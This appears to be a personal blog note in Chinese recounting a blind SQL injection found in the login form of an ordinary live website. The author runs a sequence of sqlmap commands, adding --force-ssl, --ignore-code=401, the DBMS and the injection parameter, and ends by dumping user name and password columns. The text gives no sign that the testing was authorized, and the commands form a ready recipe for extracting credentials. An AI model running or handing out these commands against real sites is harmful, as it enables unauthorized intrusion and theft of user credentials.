写给自己看
敏感数据已经打码处理
普普通通的一个站,在登录框发现盲注
手注了一下发现有64个表...一个个注要注到明年,上sqlmap!
python sqlmap.py -r C:\Users\admin\Desktop\post.txt
结果一直提示连不上...代理到burpsuite看看啥情况
python sqlmap.py -r C:\Users\admin\Desktop\post.txt -proxy http://127.0.0.1:8080
好嘛,这个站是https的,但是sqlmap一直在注http,目标也没开http自然无法访问
查了下大佬们的文章,需要加个--force-ssl参数就可以注https了
python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl
遇到新的问题,sqlmap检测到网站返回401就不继续注入了,推荐我用--ignore-code重新运行
又查了下,--ignore-code作用是忽略网站错误代码,食用方式为--ignore-code=401
python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl --ignore-code=401
居然没成功,那就指定一下数据库吧,顺便指定一下注入点
python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl --ignore-code=401 --dbms=mysql -p username
python sqlmap.py -r C:\Users\admin\Desktop\post.txt --force-ssl --ignore-code=401 --dbms=mysql -p username -D 123 -T 456 -C user_name,password --dump
终于能注了,不过拿到的数据只是测试数据的样子,还加密了
好吧,虽然没拿到什么数据,不过这次也算是了解到两个sqlmap的参数,全当学习了